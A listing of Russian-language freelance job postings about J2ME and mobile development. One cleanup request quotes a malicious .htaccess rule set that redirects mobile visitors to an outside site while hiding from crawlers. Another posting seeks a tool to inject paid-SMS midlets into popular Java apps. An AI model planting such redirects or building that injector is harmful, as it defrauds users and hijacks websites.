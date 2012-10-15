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  • Разработка мобильного приложения

    $10000

    Задачи: - Разработка мобильного приложения для имитации работы gps трекера Требования: - Образование высшее - Английский: минимум на среднем уровне - Отличное знание Java и J2ME, опыт написания и портирования Java приложений на различные модели телефонов - Опыт работы в той ...

    AndroidiOSJavaJ2ME
    Мобильные приложения7 заявок
    Закрыт
    9 лет назад

  • HTTPS соединение на J2ME

    $100

    Требуется написать модуль (Java ME platform SDK ) для https соединения с мобильного устройства , на котором ОС линукс с установленным пакетом java microedition. Подробности в личку.

    JavaJ2ME
    Мобильные приложения2 заявки
    Закрыт
    10 лет назад

  • Удалить вредоносный редирект

    Добрый день! Требуется специалист для удаления редиректа по инструкции от хостера: В файлах .htaccess Ваших сайтов найден редирект на вредоносный ресурс: RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone|iemobile|nokia|ucweb|ucbrowser|iPad|iPhone) [NC] RewriteCond %{HTTP_USER_AGENT} !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget) [NC] RewriteRule (.*) http://m.extrasoftware.biz/?19&amp;source=91.218.228.26 [L,R=302] # On Цена срок?

    AndroidJ2ME
    Веб-программирование18 заявок
    Закрыт
    10 лет назад

  • Вшивалка смс-мидлетов в java приложения (J2ME/MP)

    $100

    Основные возможности программы должны заключаться в следующем: 1)Имеется готовое ява-приложение (допустим opera mini) для сотовых телефонов. Смс-мидлет должен закрепляться за этим приложением и другими подобными известными java-программами. 2)Вывод диалогового окна при использовании с предложением оплатить пользование ...

    JavaJ2ME
    Мобильные приложениянет заявок
    Закрыт
    11 лет назад

  • Почистить сайты от вируса на одном аккаунте

    на одном аккаунте на сервере висит около 50 сайтов все заражены вирусом описание вируса ниже, нужен скрипт, что бы все почистить, если есть вопросы пишите в скайп brndcrte , укажите пожалуйста, цену работы. работа вируса заключается ...

    PHPJavascriptAndroidJoomlajQueryJavaJ2ME
    Системное администрирование1 исполнитель
    Завершен
    11 лет назад

  • Java-клиент для такси

    Необходимо разработать J2ME приложение для работы с заказами(используя LWUIT). Принцип работы клиента - периодически принимать от веб-сервера данные о заказах в формате JSON Основные функции: авторизация, меню водителя: текущие заказы, моя стоянка, выход, взятие заказа, отбивка ...

    AndroidiOSJavaJ2ME
    Мобильные приложения3 заявки
    Закрыт
    11 лет назад

  • Простое приложение для Android и J2ME

    $250

    Здравствуйте! Нужен программист для создания приложения для мобильных телефонов и Android-устройств. Знание Java ME и Android. Смысл приложения — Каталог организаций (текстовых описаний по 100–200 сиволов), сгруппированных по тематикам, в среднем 3 уровня. Примерное количество ...

    AndroidПриложение для AndroidJavaJ2ME
    Мобильные приложения3 заявки
    Закрыт
    11 лет назад

  • Разобрать Мидлет (J2ME)

    $250

    Восстановить мидлет через реверсинженеринг и наладить его взаимодействие с серверной стороной исходники были утеряны подробности в личку

    J2ME
    Мобильные приложения1 заявка
    Закрыт
    11 лет назад

  • Небольшой интерфейс для лотереи на J2ME

    $250

    Платформа: J2ME Сроки: 2-4 дня ТЗ: в приложении описание протокола, по нему понятен объем работ, детали уже с выбранным исполнителем. на данном этапе требуется авторизация, один грид, форма с просмотром информации и одна простая форма ввода данных. Бюджет: ...

    J2ME
    Мобильные приложения2 заявки
    Закрыт
    11 лет назад

  • Android developer

    $2500

    В офис на постоянное время нужен разработчик приложения для сервиса Omyconf Требования Знание Java, J2ME, Android SDK Опыт разработки 1,5 лет. Портфолио и рекомендации обязательны! Хороший английский ...

    AndroidJavaJ2ME
    Мобильные приложения1 заявка
    Закрыт
    11 лет назад

  • Перевести 20 страниц сайта английский - немецкий

    Необходим перевод страниц сайт http://it-drive.com/ с английского на немецкий. Жду ваших предложений. http://www.it-drive.com/open-source-development/drupal http://www.it-drive.com/open-source-development/joomla http://www.it-drive.com/open-source-development/magento http://www.it-drive.com/open-source-development/ruby-on-rails http://www.it-drive.com/open-source-development/symfony http://www.it-drive.com/web-development/php-development http://www.it-drive.com/web-development/ajax-development http://www.it-drive.com/web-development/lamp-development http://www.it-drive.com/web-development/java-development http://www.it-drive.com/mobile-app-development/android http://www.it-drive.com/mobile-app-development/blackberry http://www.it-drive.com/mobile-app-development/j2me http://www.it-drive.com/mobile-app-development/symbian http://www.it-drive.com/mobile-app-development/windows-mobile http://www.it-drive.com/mobile-app-development/iphone http://www.it-drive.com/microsoft-development/c-sharp http://www.it-drive.com/microsoft-development/asp-net http://it-drive.com/process/ip-protection http://it-drive.com/process/outsourcing-advantages http://it-drive.com/process/outsourcing-models http://it-drive.com/process/quality

    PHPAndroidJoomlaDrupalMagentoAjaxJavaRubyJ2MESymfonyASP.NET
    Переводы4 заявки
    Закрыт
    11 лет назад

  • J2ME Разработчик (Android)

    Требуется J2ME программист с профильным опытом работы от двух лет. Возможна удаленная работа (не менее 30ти часов в неделю). Опыт разработки приложений под Android обязателен. От вас требуется: * опыт разработки на ...

    AndroidПриложение для AndroidJavaJ2ME
    Мобильные приложениянет заявок
    Закрыт
    13 лет назад

  • Junior J2ME Developer

    Международная рекрутинговая компания WORLD STAFF ® для своего клиента подбирает высококвалифицированный персонал. Работодатель – Крупная Международная Компания Вакансия: JUNIOR J2ME DEVELOPER U475-ME КЛЮЧЕВЫЕ ОБЯЗАННОСТИ: • Разработка программного обеспечения для мобильных телефонов, планшетных компьютеров и смартбуков • Создание новых платформ для ...

    JavaJ2ME
    Мобильные приложениянет заявок
    Закрыт
    13 лет назад

  • J2ME Blackberry Developer

    $2500

    Приглашаем на фриланс основе J2ME\BB разработчика. О проекте: Zlango это новый пиктографический язык для пользователей SMS. Zlango является продолжением развития графических пиктограмм, в которых предоставлены не только специальные знаки препинания, но и возможно их свободное комбинирование с комплексным ...

    J2ME
    Мобильные приложениянет заявок
    Закрыт
    13 лет назад

  • Iphone developer (Киев)

    Iphone developer (Киев) Есть возможность работать удалённо или не полный рабочий день. Проект - разработка игр на платформе Андроид и IOS для ведущей компании в области онлайн игр, наших партнеров. Так же имеется несколько проектов которые еще ...

    AndroidHTMLiOSJ2ME
    Мобильные приложениянет заявок
    Закрыт
    13 лет назад

  • Программист J2ME

    $500

    В компанию на удаленную работу требуется java программист для разработки приложений для телефонов. Опыт работы более 3-х лет, отличное знание своего дела. Ответственный, исполнительный, всегда на связи.

    JavaJ2ME
    Мобильные приложения3 заявки
    Закрыт
    13 лет назад

  • Разработчик j2me

    Нужен разработчик с опытом работы в создании онлайн игр/игр для мобильных телефонов. Задача: Разработка клиентской части мобильного приложения. Функции приложения: — осуществление команд пользователя согласно игровому процессу — взаимодействие с серверной частью (БД и пр.) — отправка SMS из ...

    J2ME
    Разработка игрнет заявок
    Закрыт
    13 лет назад

  • Требуется программист Java

    $1000

    Требования опыт разработки на Java; приложений J2ME (MIDP-1.0/MIDP-2.0), сетевых приложений как на уровне socket-тов, так и на уровне http.графических и/или игровых приложений на J2ME; знание специфики реализаций и граблей на различных телефонах; специфичных API производителей телефонов; ...

    JavaJ2ME
    Веб-программированиенет заявок
    Закрыт
    13 лет назад